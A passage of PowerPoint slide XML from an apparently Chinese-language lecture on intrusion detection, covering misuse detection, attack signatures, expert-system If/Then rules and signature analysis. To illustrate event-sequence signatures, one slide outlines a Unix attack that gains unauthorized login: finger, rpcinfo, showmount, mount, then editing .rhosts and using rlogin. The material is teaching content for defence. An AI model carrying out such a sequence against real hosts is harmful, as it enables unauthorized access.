            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>能明显降低误报率，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>但漏报率随之增加。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>为什么呢？因为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>攻击特征的细微变化，都会使得误用检测无能为力。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>从误用检测的原理可以看出，其核心就是攻击特征。如何构建一个准确、全面的攻击特征库是其关键技术。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>过短的攻击特征描述会错误的触发</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，从而导致误报；而过长的攻击特征，又会减慢</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的速度，降低效率。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" alt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257636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表格中是对部分攻击特征的举例，分别从目标端口，协议类型和数据包的字节数对响应的攻击进行描述。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>当然，实际用于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>误用检测攻击特征会考虑更多的参数，并不是这么简单。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRP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153891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专家系统误用检测方法：</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dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>首先专家将网络入侵行为的知识表示成一些类似</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>If Then</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>的规则，并以这些规则为基础建立专家知识库。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>规则中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>If</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>部分说明形成网络入侵的必需条件，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>Then</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>部分说明发现入侵后要实施的操作</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>入侵检测系统将网络行为的审计数据事件进行转换，成为包含入侵警告程度的判断事实，然后通过推理引擎进行入侵检测，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>当</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>If</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>中的条件全部满足或者在一定程度上满足时，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>Then</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>中的动作就会被执行</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF3300"/>
              </a:solidFill>
              <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF3300"/>
              </a:solidFill>
              <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>专家系统误用检测方法适合于有特征的入侵</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF3300"/>
              </a:solidFill>
              <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>缺点是，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>需要处理大量的审计数据并且依赖于审计追踪的次序，处理速度难以保证；对于各种网络攻击行为知识进行规则化描述的精度有待提高；只能检测出以往发现过的入侵行为，维护知识库的工作量很大</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="113541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sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>基于特征分析的误用检测方法和专家系统误用检测一样，也需要搜集关于入侵行为的各种知识。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>与专家系统不同的是，它不需要将知识转化为规则，二是直接将入侵行为表示为一个事件序列或者转换成某种可以直接在网络数据包审计记录中找到的数据模板。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>这样在检测时就可以直接进行数据匹配，而不需要进行大量的数据处理，相对专家系统提高了检测效率。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>但是，特征分析误用检测仍然需要及时更新入侵特征知识库库，建立和维护知识库的工作量仍然很大。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF3300"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>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7172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另外一方面，各种各样简单易用的网络入侵工具软件，也是层出不穷、唾手可得。</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801688" marR="0" lvl="1" indent="-45720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lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>我们来看一个特征分析误用检测，将入侵行为表示成事件序列的例子：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="801688" marR="0" lvl="1" indent="-45720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lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>获取文件访问权限攻击的实例</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"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 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CC0000"/>
              </a:solidFill>
              <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="801688" lvl="1" indent="-457200">
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
              <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="801688" lvl="1" indent="-457200">
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>攻击目标主机操作系统为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>Unix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>，以获取文件访问权限可采取如下步骤：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
              <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="801688" lvl="1" indent="-457200">
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
              <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="801688" lvl="1" indent="-457200"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>finger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>命令查询目标主机的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>帐号信息</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="801688" lvl="1" indent="-457200"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>rpcinfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>命令获取信息</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="801688" lvl="1" indent="-457200"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>showmount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>命令获取文件系统信息</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="801688" lvl="1" indent="-457200"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>mount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>命令绑定主机目录</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="801688" lvl="1" indent="-457200"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>cat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>命令修改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>rhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>文件，获得登录权限</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="801688" lvl="1" indent="-457200"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>rlogin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>命令远程登录目标机器。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
